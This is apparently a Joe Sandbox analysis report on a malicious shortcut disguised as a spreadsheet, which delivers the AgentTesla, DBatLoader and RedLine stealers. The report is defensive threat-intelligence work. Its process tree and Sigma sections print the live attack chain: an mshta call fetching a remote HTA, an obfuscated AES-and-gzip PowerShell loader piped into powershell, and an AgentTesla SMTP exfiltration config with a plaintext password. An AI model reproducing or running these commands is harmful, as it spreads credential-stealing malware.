Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FT. 40FE CNY .xlsx.lnk

Overview

General Information

Sample name:FT. 40FE CNY .xlsx.lnk
Analysis ID:1430751
MD5:82fde340f187a517e0feced1d4972363
SHA1:07740ba4e30a1dbc830451a0d05130ba1af28be9
SHA256:e900f16dc064f78f6d81fda1dc52a17116d4bb578e6ef528e2f04b3e46b434a3
Tags:lnk
Infos:

Detection

AgentTesla, DBatLoader, PureLog Stealer, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
Drops PE files with a suspicious file extension
Found URL in windows shortcut file (LNK)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Program Location with Network Connections
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Outbound SMTP Connections
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 5632 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 7260 cmdline: "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 7688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" - MD5: 04029E121A0CFA5991749937DD22A1D9)
          • uc.exe (PID: 8080 cmdline: "C:\Users\user\AppData\Roaming\uc.exe" MD5: E6AC6CA27AA2D60DC59A21AF1FFDB086)
            • cmd.exe (PID: 5360 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • extrac32.exe (PID: 1460 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
            • bwsiuvcU.pif (PID: 6340 cmdline: C:\Users\Public\Libraries\bwsiuvcU.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • svchost.exe (PID: 7612 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Ucvuiswb.PIF (PID: 1916 cmdline: "C:\Users\Public\Libraries\Ucvuiswb.PIF" MD5: E6AC6CA27AA2D60DC59A21AF1FFDB086)
    • bwsiuvcU.pif (PID: 2196 cmdline: C:\Users\Public\Libraries\bwsiuvcU.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • Ucvuiswb.PIF (PID: 2236 cmdline: "C:\Users\Public\Libraries\Ucvuiswb.PIF" MD5: E6AC6CA27AA2D60DC59A21AF1FFDB086)
    • bwsiuvcU.pif (PID: 2324 cmdline: C:\Users\Public\Libraries\bwsiuvcU.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.irmaklarpaslanmaz.com.trB", "Username": "muhasebe@irmaklarpaslanmaz.com.tr", "Password": "MH5473588PmZ&"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\UcvuiswbO.batMALWARE_BAT_KoadicBATKoadic post-exploitation framework BAT payloadditekSHen
  • 0x2:$s1: &@cls&@set
  • 0x5b:$s2: :~41,1%%
  • 0x67:$s2: :~47,1%%
  • 0x73:$s2: :~6,1%%
  • 0x7e:$s2: :~53,1%%
  • 0x8a:$s2: :~1,1%
  • 0x9b:$s2: :~10,1%%
  • 0xa7:$s2: :~39,1%%
  • 0xb3:$s2: :~16,1%%
  • 0xbf:$s2: :~13,1%%
  • 0xcb:$s2: :~25,1%%
  • 0xd7:$s2: :~53,1%%
  • 0xe3:$s2: :~42,1%%
  • 0xef:$s2: :~22,1%%
  • 0xfb:$s2: :~18,1%%
  • 0x107:$s2: :~48,1%%
  • 0x113:$s2: :~51,1%%
  • 0x11f:$s2: :~2,1%%
  • 0x12a:$s2: :~61,1%%
  • 0x136:$s2: :~9,1%%
  • 0x141:$s2: :~19,1%%

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001A.00000002.1728089924.0000000002831000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    00000017.00000002.1639938993.00000000004A0000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000017.00000002.1682459055.00000000409C0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000013.00000002.1499010628.0000000002385000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            Click to see the 61 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            27.3.bwsiuvcU.pif.3bd8fed0.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                23.2.bwsiuvcU.pif.400000.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  23.2.bwsiuvcU.pif.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                  • 0x1300:$s3: 83 EC 38 53 B0 EF 88 44 24 2B 88 44 24 2F B0 74 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                  • 0x1fdd0:$s5: delete[]
                  • 0x1f288:$s6: constructor or from DllMain.
                  25.1.bwsiuvcU.pif.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 72 entries

                    Other

                    SourceRuleDescriptionAuthorStrings
                    amsi64_7800.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                    • 0xc049:$b1: ::WriteAllBytes(
                    • 0xbcbc:$s1: -join
                    • 0x5468:$s4: +=
                    • 0x552a:$s4: +=
                    • 0x9751:$s4: +=
                    • 0xb86e:$s4: +=
                    • 0xbb58:$s4: +=
                    • 0xbc9e:$s4: +=
                    • 0xe383:$s4: +=
                    • 0xe403:$s4: +=
                    • 0xe4c9:$s4: +=
                    • 0xe549:$s4: +=
                    • 0xe71f:$s4: +=
                    • 0xe7a3:$s4: +=
                    • 0xc86c:$e4: Get-WmiObject
                    • 0xca5b:$e4: Get-Process
                    • 0xcab3:$e4: Start-Process

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Base64 Encoded PowerShell Command Detected
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography
                    Sigma detected: Execution from Suspicious Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\bwsiuvcU.pif, CommandLine: C:\Users\Public\Libraries\bwsiuvcU.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\bwsiuvcU.pif, NewProcessName: C:\Users\Public\Libraries\bwsiuvcU.pif, OriginalFileName: C:\Users\Public\Libraries\bwsiuvcU.pif, ParentCommandLine: "C:\Users\user\AppData\Roaming\uc.exe" , ParentImage: C:\Users\user\AppData\Roaming\uc.exe, ParentProcessId: 8080, ParentProcessName: uc.exe, ProcessCommandLine: C:\Users\Public\Libraries\bwsiuvcU.pif, ProcessId: 6340, ProcessName: bwsiuvcU.pif
                    Sigma detected: New RUN Key Pointing to Suspicious Folder
                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Ucvuiswb.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\uc.exe, ProcessId: 8080, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ucvuiswb
                    Sigma detected: Potentially Suspicious PowerShell Child Processes
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta, CommandLine: "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5632, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta, ProcessId: 7260, ProcessName: mshta.exe
                    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography
                    Sigma detected: Suspicious MSHTA Child Process
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 